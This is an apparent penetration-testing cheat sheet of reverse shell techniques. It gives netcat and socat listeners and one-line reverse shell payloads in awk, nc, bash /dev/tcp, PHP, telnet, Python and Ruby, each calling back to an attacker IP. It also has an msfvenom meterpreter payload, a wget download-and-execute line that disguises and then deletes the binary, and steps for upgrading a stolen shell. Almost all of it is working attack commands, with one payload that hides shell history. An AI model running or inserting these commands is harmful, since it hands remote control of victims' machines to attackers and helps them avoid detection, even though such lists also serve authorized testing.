Reverse Shell

Listeners

nc -nlvp <port>
nc -nlvp <port> <<< <cmd>
socat file:`tty`,raw,echo=0 tcp-listen:<port>
socat file:`tty`,echo=0,raw  udp-listen:<port>

Payloads

awk
awk 'BEGIN {s = "/inet/tcp/0/<LHOST>/<LPORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
nc (GAPING_SECURITY_HOLE disabled)
nc <ip> <port> -e /bin/bash
nc <ip> <port> -c /bin/bash
mkfifo + nc
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> >/tmp/f
mknod + nc
mknod backpipe p && nc <ip> <port> 0<backpipe | /bin/bash 1>backpipe
TCP socket
/bin/bash -i > /dev/tcp/<ip>/<port> 0<&1 2>&1
PHP
php -r '$sock=fsockopen("<ip>",<port>);exec("/bin/bash -i <&3 >&3 2>&3");'
Telnet
telnet <ip> <port> 0<backpipe | /bin/bash 1>backpipe
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

UDP-use socat UDP listener (not tested)

python -c 'import socket,pty,os;lhost = "<ip>"; lport = <port>; s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.connect((lhost, lport)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); os.putenv("HISTFILE",'/dev/null'); pty.spawn("/bin/bash"); s.close();
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Drop a file

Payloads
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=<ip> lport=445 -f elf -o test.elf
Delivery
wget <ip/domain>/test.elf -O /tmp/<less_suspicious_executable_name> && chmod 777 /tmp/<l_s_e_n> && /tmp/<l_s_e_n> && rm /tmp/<l_s_e_n>

Copy (base64)

1)cat file2upload | base64
2)Create the file on the target and copy
2)impacket-smbserver w00t .
3)cat fileWithBase64Content | base64 -d > finalBinary

Interactive reverse shell

https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ https://netsec.ws/?p=337

nc -nlvp <port>
python -c 'import pty; pty.spawn("/bin/bash")'
[CTRL + Z]
echo $TERM
stty -a
stty raw -echo
fg
reset
export SHELL=bash
export TERM=xterm256-color #according to "echo $TERM"
stty rows 38 columns 116 # according to "stty -a"

stty raw +echo